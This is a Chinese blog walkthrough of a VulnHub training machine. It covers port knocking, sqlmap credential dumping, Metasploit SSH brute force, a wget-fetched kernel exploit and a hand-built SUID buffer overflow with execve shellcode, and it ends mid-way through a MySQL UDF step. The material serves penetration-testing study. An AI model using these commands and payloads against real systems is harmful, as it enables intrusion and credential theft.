vulnhub靶机渗透[Lord-Of-The-Root-1-0-1]

Posted on Edited on In Views: Word count in article: 5.2k Reading time ≈ 19 mins.

名称

名称:Lord Of The Root: 1.0.1
发行日期:2015年9月23日

下载

  • Download: http://www.mediafire.com/download/m5tbx0dua05szjm/LordOfTheRoot.ova
  • Download (Mirror): https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova
  • Download (Torrent): https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova.torrent

描述

创建这台机器是为了帮助其他人学习一些基本的CTF hack技巧和一些工具。这台机器的难度与我在OSCP上遇到的难度非常相似。这是一个引导到root的靶机,不需要任何来宾交互。有两种设计的权限提升方法。

  • 23/09/2015 == v1.0.1
  • 22/09/2015 == v1.0

如果您在使用VirtualBox时遇到问题,请尝试以下操作:

  • 下载LordOfTheRoot_1.0.1.ova(确认文件哈希)
  • 下载并安装了VMWare ovftool。
  • 使用ovftool将OVA转换为OVF。
  • 使用文本编辑器修改了OVF,并执行以下操作:将所有对“ElementName”的引用替换为“标题”,将对“vmware.sata.ahci”的单个引用替换为“AHCI”
  • 保存了OVF。+删除.mf(清单)文件。如果不这样做,则在导入时会出现错误,说SHA与OVF不匹配(尝试过修改哈希,但没有成功)。
  • 尝试导入OVF文件,应该可以正常工作。

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.113
Host is up (0.00022s latency).
MAC Address: 08:00:27:0B:D4:69 (Oracle VirtualBox virtual NIC)
1
2
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)

连接一下ssh试试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:~# ssh 192.168.56.113
The authenticity of host '192.168.56.113 (192.168.56.113)' can't be established.
ECDSA key fingerprint is SHA256:XzDLUMxo8ifHi4SciYJYj702X3PfFwaXyKOS07b6xd8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.113' (ECDSA) to the list of known hosts.

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
Enter passphrase for key '/root/.ssh/id_rsa': 
root@192.168.56.113's password:

当搜索SSH时,它说Knock Friend To Enter''和Easy as 123’’,然后要求输入我们不知道的密码。现在,这暗示着端口碰撞。试试看:

1
2
3
4
5
6
root@kali:~# nmap -r -Pn -p 1,2,3 192.168.56.113 -v
PORT  STATE    SERVICE
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 08:00:27:0B:D4:69 (Oracle VirtualBox virtual NIC)

现在再次启动nmap扫描。希望这次的结果中有多个端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# nmap -p- -A -v 192.168.56.113 --min-rate=10000
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|   256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_  256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

如所见,与我们之前的扫描相比,还有一个开放的端口,即1337,它有HTTP服务,这就是想要的,因为默认情况下80端口没有打开。让我们通过此端口打开目标IP。

1
http://192.168.56.113:1337/

如上所示,打开的页面仅包含一张图片,然后还检查了其源代码,但没有任何线索。通常,总是有一些将robots.txt文件放入网络目录的机会,因此,在渗透任何系统时,都应始终检查robots.txt文件。在这里,已经在地址192.168.56.113:1337/robots.txt中对robots.txt进行了测试,将打开一个新的网页,显示以下图片。

getshell

之后,我们查看了其源代码并找到了base64的编码值。

1
2
3
4
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

解码

1
2
3
root@kali:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!root@kali:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d
/978345210/index.php

访问以下的url

1
http://192.168.56.113:1337/978345210/index.php

现在,有一个登录口。尝试SQL注入的帮助下登录,使用sqlmap。
由于不知道确切的用户名和密码,因此,使用SQLMAP进行基于登录表单的注入,通过执行以下命令来检索数据库名称和登录凭据。

时间盲注,好慢。。。最后,显示用户名和密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# sqlmap -u "http://192.168.56.113:1337/978345210/index.php" --forms -D Webapp -T Users --dump --batch
Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password         | username |
+----+------------------+----------+
| 1  | iwilltakethering | frodo    |
| 2  | MyPreciousR00t   | smeagol  |
| 3  | AndMySword       | aragorn  |
| 4  | AndMyBow         | legolas  |
| 5  | AndMyAxe         | gimli    |
+----+------------------+----------+

将所有这些用户名和密码保存在两个不同的文本文件中。并借助方法在SSH登录暴力破解使用此文本文件。执行攻击,请转到Kali的终端并通过键入msfdb run并进一步键入来打开Metasploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
root@kali:~/vulnhub/lordoftheroot# msfdb run
[+] Starting database
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                                    
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                  
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                 
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo                                                                                
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx                                                                                
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl                                                                                
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.                                                                                
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc                                                                                 
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo                                                                                  
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl                                                                                   
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;                                                                                    
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.                                                                                     
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,                                                                                       
           :kk;.OOOOOOOOOOOOO.;Ok:                                                                                         
             ;kOOOOOOOOOOOOOOOk:                                                                                           
               ,xOOOOOOOOOOOx,                                                                                             
                 .lOOOOOOOl.                                                                                               
                    ,dOd,                                                                                                  
                      .                                                                                                    

       =[ metasploit v5.0.69-dev                          ]
+ -- --=[ 1959 exploits - 1094 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.113
rhosts => 192.168.56.113
msf5 auxiliary(scanner/ssh/ssh_login) > set user_file /root/vulnhub/lordoftheroot/user.txt
user_file => /root/vulnhub/lordoftheroot/user.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/vulnhub/lordoftheroot/pass.txt
pass_file => /root/vulnhub/lordoftheroot/pass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

[+] 192.168.56.113:22 - Success: 'smeagol:MyPreciousR00t' ''
[*] Command shell session 1 opened (192.168.56.102:43037 -> 192.168.56.113:22) at 2020-01-25 12:36:48 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

得到正确的用户名和密码

1
smeagol/MyPreciousR00t

此外,Metasploit通过提供远程系统命令shell(未经授权访问受害者系统)提供了额外的好处。现在开始渗透访问root权限。然后,要访问适当的TTY Shell,键入以下python一行脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf5 auxiliary(scanner/ssh/ssh_login) > sessions 1
[*] Starting interaction with 1...

Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
python -c 'import pty;pty.spawn("/bin/bash")'
smeagol@LordOfTheRoot:~$ id
id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
smeagol@LordOfTheRoot:~$ whoami
whoami
smeagol
smeagol@LordOfTheRoot:~$

提权1:搜索exploit来提权

到达终端。在这里,键入以下命令以了解内核的版本:

1
2
3
4
5
6
7
smeagol@LordOfTheRoot:~$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.3 LTS
Release:        14.04
Codename:       trusty

版本是14.04,幸运的是,对此版本有一个exploit。在Kali终端中,搜索以下类型的漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@kali:~# searchsploit ubuntu 14.04
---------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                    |  Path
                                                                                  | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------------
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation           | exploits/linux/local/37088.c
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation                       | exploits/linux/local/36782.sh
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 /  | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ld | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Acces | exploits/linux/local/39771.txt
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local P | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local P | exploits/linux/local/37293.txt
Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SM | exploits/linux/local/41999.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation  | exploits/linux/local/39166.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privi | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race C | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escal | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - L | exploits/linux/local/47169.c
NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)                  | exploits/linux/dos/37777.txt
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation   | exploits/linux/local/41762.txt
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow                       | exploits/linux/local/44204.md
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation         | exploits/linux/local/36820.txt
---------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

选下面这个exploit,当然,自己也可以去尝试其他的exploit,我这里为了节约时间就不演示了。。。

1
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation  | exploits/linux/local/39166.c

借助cp命令将漏洞exploit复制到当前目录,然后运行HTTP python服务器将其转移到目标计算机中。

1
2
3
4
5
root@kali:~/vulnhub/lordoftheroot# cp /usr/share/exploitdb/exploits/linux/local/39166.c .
root@kali:~/vulnhub/lordoftheroot# ls
39166.c  pass.txt  user.txt
root@kali:~/vulnhub/lordoftheroot# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...

在shell中编译exp,然后赋予权限,运行生成的exp进行提权,可以看到提权成功,非常的简单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
smeagol@LordOfTheRoot:~$ wget http://192.168.56.102:8000/39166.c
wget http://192.168.56.102:8000/39166.c
--2020-01-25 18:52:13--  http://192.168.56.102:8000/39166.c
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2789 (2.7K) [text/plain]
Saving to: ‘39166.c’

100%[======================================>] 2,789       --.-K/s   in 0s      

2020-01-25 18:52:13 (575 MB/s) - ‘39166.c’ saved [2789/2789]

smeagol@LordOfTheRoot:~$ gcc 39166.c -o exp
gcc 39166.c -o exp
smeagol@LordOfTheRoot:~$ chmod 777 exp
chmod 777 exp
smeagol@LordOfTheRoot:~$ ./exp
./exp
root@LordOfTheRoot:~# id
id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:~# whoami
whoami
root

最后找到flag,挑战结束

1
2
3
4
root@LordOfTheRoot:/root# cat Flag.txt
cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

提权2:利用SUID利用root拥有的二进制文件来获得root

导航到root目录,看到一个名为“SECRET”的目录。在此目录中,有3个“doors”,每个都有一个名为“file”的文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
smeagol@LordOfTheRoot:/$ cd SECRET
cd SECRET
smeagol@LordOfTheRoot:/SECRET$ ls
ls
door1  door2  door3
smeagol@LordOfTheRoot:/SECRET$ ls -lahR
ls -lahR
.:
total 20K
drwxr-xr-x  5 root root 4.0K Sep 22  2015 .
drwxr-xr-x 23 root root 4.0K Sep 22  2015 ..
drwxr-xr-x  2 root root 4.0K Jan 25 19:15 door1
drwxr-xr-x  2 root root 4.0K Jan 25 19:15 door2
drwxr-xr-x  2 root root 4.0K Jan 25 19:15 door3

./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 .
drwxr-xr-x 5 root root 4.0K Sep 22  2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17  2015 file

./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 .
drwxr-xr-x 5 root root 4.0K Sep 22  2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17  2015 file

./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Jan 25 19:15 .
drwxr-xr-x 5 root root 4.0K Sep 22  2015 ..
-rwsr-xr-x 1 root root 5.1K Sep 22  2015 file

看到这些文件具有SUID并由Root拥有!如果可以利用这一点,那可能就是升级root的门票。检查每个文件,看到它们都是二进制可执行文件。但是,3个中的1个具有不同的sha1哈希:

1
2
3
4
5
smeagol@LordOfTheRoot:/SECRET$ file door1/file door2/file door3/file
file door1/file door2/file door3/file
door1/file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped
door2/file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped
door3/file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped

根据以前的经验,最好使用与其他2不同的二进制文件。此外,注意到在设置了一定时间后,二进制文件被切换到了新的door。为了解决这个问题,将文件复制到smeagol的桌面上以进行更一致的测试:

1
2
3
4
5
smeagol@LordOfTheRoot:/SECRET$ cp door2/file /home/smeagol/Desktop/
cp door2/file /home/smeagol/Desktop/
smeagol@LordOfTheRoot:/SECRET$ ls /home/smeagol/Desktop/
ls /home/smeagol/Desktop/
file

运行此文件,看到它要求用户输入字符串:

1
2
3
4
5
smeagol@LordOfTheRoot:~/Desktop$ ./file
./file
Syntax: ./file <input string>
smeagol@LordOfTheRoot:~/Desktop$ ./file A
./file A

看到这是vulnhub上的映像,可以假定该文件容易受到缓冲区溢出的影响。使用python来模糊文件并确认:

1
2
3
4
5
6
7
8
9
10
11
12
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 100')
./file $(python -c 'print "A" * 100')
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 200')
./file $(python -c 'print "A" * 200')
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 150')
./file $(python -c 'print "A" * 150')
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 175')
./file $(python -c 'print "A" * 175')
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:~/Desktop$ ./file $(python -c 'print "A" * 160')
./file $(python -c 'print "A" * 160')

注意到当文件接收大约175个字符时存在分段错误。
为了获得更准确的计数,使用metasploit中的内置ruby脚本来创建175个字符的模式字符串:

1
2
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 175
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A

采用以下字符串并通过GDB运行它,然后运行字符串:

1
2
3
4
5
6
7
8
9
smeagol@LordOfTheRoot:~/Desktop$ gdb -q ./file
gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A
<8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A                
Starting program: /home/smeagol/Desktop/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()

如预期的那样,在0x41376641收到段错误。可以将此数字带回metasploit脚本,以查看它是多少个字符:

1
2
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41376641
[*] Exact match at offset 171

现在知道二进制文件将在第171个字符串处进行段错误处理,然后可以更新fuzz进行确认。通过GDB,添加171个字符A,4个字符B和其余的C。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
smeagol@LordOfTheRoot:~/Desktop$ gdb -q ./file
gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) run $(python -c 'print "A" * 171 + "B" * 4 + "C" * 50')
run $(python -c 'print "A" * 171 + "B" * 4 + "C" * 50')
Starting program: /home/smeagol/Desktop/file $(python -c 'print "A" * 171 + "B" * 4 + "C" * 50')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info r
info r
eax            0x0      0
ecx            0xbffffdd0       -1073742384
edx            0xbffffb54       -1073743020
ebx            0xb7fc0000       -1208221696
esp            0xbffffb30       0xbffffb30
ebp            0x41414141       0x41414141
esi            0x0      0
edi            0x0      0
eip            0x42424242       0x42424242
eflags         0x10202  [ IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

如上所示,检查了寄存器,发现EIP现在已被0x42424242覆盖,该十六进制转换为BBBB。现在可以控制EIP!进一步的枚举告诉我还启用了ASLR:

1
2
3
smeagol@LordOfTheRoot:~/Desktop$ cat /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
2

看到启用了ASLR,这将使的地址空间随机化。此外,程序中没有可使用的JMP ESP指令。使无法指定特定的EIP地址来指向shellcode。

但是,我的想法是,如果可以循环利用漏洞,也许可以“猜测”甚至更好,用EIP地址获得“lucky”,从而击中了shellcode。为此,需要在漏洞利用程序中添加一个较大的NOPsled,以便如果EIP确实被正确击中,则NOPsled将允许程序滑至我的shellcode。

再次运行payload,这次使用了2000个较大的Nopsled:

1
2
3
4
5
6
7
8
9
10
11
12
smeagol@LordOfTheRoot:~/Desktop$ gdb -q ./file
gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) run $(python -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
run $(python -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
Starting program: /home/smeagol/Desktop/file $(python -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/s $esp
x/s $esp
0xbfffee70:     '\220' <repeats 200 times>...

因此,仍然可以控制EIP,看来ESP指向的是其他位置,0xbfffee70,将使用它作为EIP的位置。另外,将包括shellcode。生成shell的非常常见的shellcode是:

1
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

在当前的GDB会话中测试payload,以确认漏洞利用程序是否正常工作:

1
2
3
4
5
6
7
8
9
10
(gdb) run $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/file $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
process 30271 is executing new program: /bin/dash
$ id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
$ whoami
smeagol

优秀!产生了一个shell。但是,以smeagol的身份运行,而不是以root用户身份运行,因为这只是我复制下来的文件。另外,请务必注意,我的EIP地址位置“\x70\xee\xff\xbf”
由于字节序少,所以反向写入。

现在,我知道我的漏洞利用程序有用,现在是时候将该漏洞循环到真实环境中了。使用以下脚本来完成此任务:

1
for a in {1..1000}; do ./file $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done

准备好漏洞利用程序后,回到/SECRET/目录并找到适当的文件并执行脚本:

1
2
3
4
smeagol@LordOfTheRoot:/SECRET$ file door1/file door2/file door3/file
door1/file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped
door2/file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=364b5cbb85546e36256039ce4599eee471bfbf86, not stripped
door3/file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped

运行下面的命令,成功提权如下所示。。。

1
for a in {1..1000}; do /SECRET/door3/file $(python -c 'print "A" * 171 + "\x70\xee\xff\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)
# whoami
root

读取flag

1
2
3
4
5
6
# cd /root
# ls                                                                                                                                                                                                                                       
Flag.txt  buf  buf.c  other  other.c  switcher.py                                                                                                                                                                                          
# cat Flag.txt                                                                                                                                                                                                                             
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”                                                                                                                                   
– Gandalf

提权3:mysql-udf提权

使用sqlmap dump出mysql的用户名和密码的hash值,之前的步骤略

1
2
3
4
5
6
root@kali:~# sqlmap -u http://192.168.56.113:1337/978345210/index.php --forms --batch -D mysql -T user --dump
root             | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
root             | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
debian-sys-maint | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F | 
root             | <blank> | *A55A9B9049F69BC2768C9284615361DFBD580B34 |
root             | <blank> | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |

解密出

1
*4DD56158ACDBA81BFE3FF9D3D7375231596CE10F

的值是darkshadow
然后用之前的账号和密码先连接ssh

searchsploit搜索mysql udf提权exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
root@kali:~# searchsploit User-Defined Function
---------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                    |  Path
                                                                                  | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------------
Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly ca | exploits/windows/dos/43466.js
